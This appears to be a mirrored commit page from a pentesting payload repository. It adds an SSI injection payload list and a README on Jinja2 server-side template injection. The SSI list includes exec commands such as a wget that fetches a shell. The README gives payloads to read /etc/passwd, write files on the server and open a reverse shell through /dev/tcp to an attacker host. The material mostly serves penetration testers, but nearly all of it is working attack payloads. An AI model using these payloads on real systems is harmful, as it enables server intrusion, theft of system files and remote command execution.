mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 06:53:04 -08:00
SSTI + XSS Flash
This commit is contained in:
Swissky
75
Server Side Template injections/JHADDIX_SSI_Injection.txt
Normal file
75
Server Side Template injections/JHADDIX_SSI_Injection.txt
Normal file
@@ -0,0 +1,75 @@
|
||||
<pre><!--#exec cmd="ls" --></pre>
|
||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||
<pre><!--#exec cmd="whoami"--></pre>
|
||||
<pre><!--#exec cmd="dir" --></pre>
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||
<!--#exec cmd="/bin/ls /" -->
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||
<!--#config errmsg="File not found, informs users and password"-->
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#fsize file="ssi.shtml" -->
|
||||
<!--#include file=?UUUUUUUU...UU?-->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#exec cmd="whoami"-->
|
||||
<!--#printenv -->
|
||||
<!--#flastmod virtual="echo.html" -->
|
||||
<!--#echo var="auth_type" -->
|
||||
<!--#echo var="http_referer" -->
|
||||
<!--#echo var="content_length" -->
|
||||
<!--#echo var="content_type" -->
|
||||
<!--#echo var="http_accept_encoding" -->
|
||||
<!--#echo var="forwarded" -->
|
||||
<!--#echo var="document_uri" -->
|
||||
<!--#echo var="date_gmt" -->
|
||||
<!--#echo var="date_local" -->
|
||||
<!--#echo var="document_name" -->
|
||||
<!--#echo var="document_root" -->
|
||||
<!--#echo var="from" -->
|
||||
<!--#echo var="gateway_interface" -->
|
||||
<!--#echo var="http_accept" -->
|
||||
<!--#echo var="http_accept_charset" -->
|
||||
<!--#echo var="http_accept_language" -->
|
||||
<!--#echo var="http_connection" -->
|
||||
<!--#echo var="http_cookie" -->
|
||||
<!--#echo var="http_form" -->
|
||||
<!--#echo var="http_host" -->
|
||||
<!--#echo var="user_name" -->
|
||||
<!--#echo var="unique_id" -->
|
||||
<!--#echo var="tz" -->
|
||||
<!--#echo var="total_hits" -->
|
||||
<!--#echo var="server_software" -->
|
||||
<!--#echo var="server_protocol" -->
|
||||
<!--#echo var="server_port" -->
|
||||
<!--#echo var="server_name -->
|
||||
<!--#echo var="server_addr" -->
|
||||
<!--#echo var="server_admin" -->
|
||||
<!--#echo var="script_url" -->
|
||||
<!--#echo var="script_uri" -->
|
||||
<!--#echo var="script_name" -->
|
||||
<!--#echo var="script_filename" -->
|
||||
<!--#echo var="netsite_root" -->
|
||||
<!--#echo var="site_htmlroot" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info_translated" -->
|
||||
<!--#echo var="request_uri" -->
|
||||
<!--#echo var="request_method" -->
|
||||
<!--#echo var="remote_user" -->
|
||||
<!--#echo var="remote_addr" -->
|
||||
<!--#echo var="http_client_ip" -->
|
||||
<!--#echo var="remote_port" -->
|
||||
<!--#echo var="remote_ident" -->
|
||||
<!--#echo var="remote_host" -->
|
||||
<!--#echo var="query_string_unescaped" -->
|
||||
<!--#echo var="query_string" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info" -->
|
||||
<!--#echo var="path" -->
|
||||
<!--#echo var="page_count" -->
|
||||
<!--#echo var="last_modified" -->
|
||||
<!--#echo var="http_user_agent" -->
|
||||
<!--#echo var="http_ua_os" -->
|
||||
<!--#echo var="http_ua_cpu" -->
|
||||
69
Server Side Template injections/README.md
Normal file
69
Server Side Template injections/README.md
Normal file
@@ -0,0 +1,69 @@
|
||||
# Templates Injections
|
||||
|
||||
Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
|
||||
## Jinja2
|
||||
[Official website](http://jinja.pocoo.org/)
|
||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||
|
||||
Basic injection
|
||||
```
|
||||
{{4*4}}[[5*5]]
|
||||
```
|
||||
|
||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||
The above injections have been tested on Flask application.
|
||||
#### Template format
|
||||
```
|
||||
{% extends "layout.html" %}
|
||||
{% block body %}
|
||||
<ul>
|
||||
{% for user in users %}
|
||||
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
|
||||
{% endfor %}
|
||||
</ul>
|
||||
{% endblock %}
|
||||
|
||||
```
|
||||
|
||||
#### Dump all used classes
|
||||
```
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
```
|
||||
|
||||
#### Dump all config variables
|
||||
```python
|
||||
{% for key, value in config.iteritems() %}
|
||||
<dt>{{ key|e }}</dt>
|
||||
<dd>{{ value|e }}</dd>
|
||||
{% endfor %}
|
||||
```
|
||||
|
||||
#### Read remote file
|
||||
```
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
```
|
||||
|
||||
#### Write into remote file
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||
```
|
||||
|
||||
#### Remote Code Execution via reverse shell
|
||||
Listen for connexion
|
||||
```
|
||||
nv -lnvp 8000
|
||||
```
|
||||
Inject this template
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
#### Ressources & Sources
|
||||
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
|
||||
#### Training
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
Reference in New Issue
Block a user